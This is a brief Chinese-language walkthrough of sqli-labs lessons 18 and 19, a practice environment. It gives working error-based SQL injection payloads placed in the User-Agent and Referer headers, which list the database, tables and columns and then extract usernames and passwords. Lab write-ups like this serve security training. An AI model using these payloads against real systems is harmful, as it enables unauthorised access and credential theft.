环境sqli-labs
less 18
1、在UA处输入特殊字符,报错
2、构造输入语句,获取数据库名称
or updatexml(1,concat('##',(database())),0))#
3、获取表名
or updatexml(1,concat('##',(select group_concat(table_name) from information_schema.tables where table_schema='security')),0))#
4、获取字段
or updatexml(1,concat('#',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),0))#
5、获取字段内容
or updatexml(1,concat('#',(select * from (select concat_ws('#',id,username,password) from users limit 0,1) a)),0))#
less 19
输入点在referer,注入语句同less 18
禁止非法,后果自负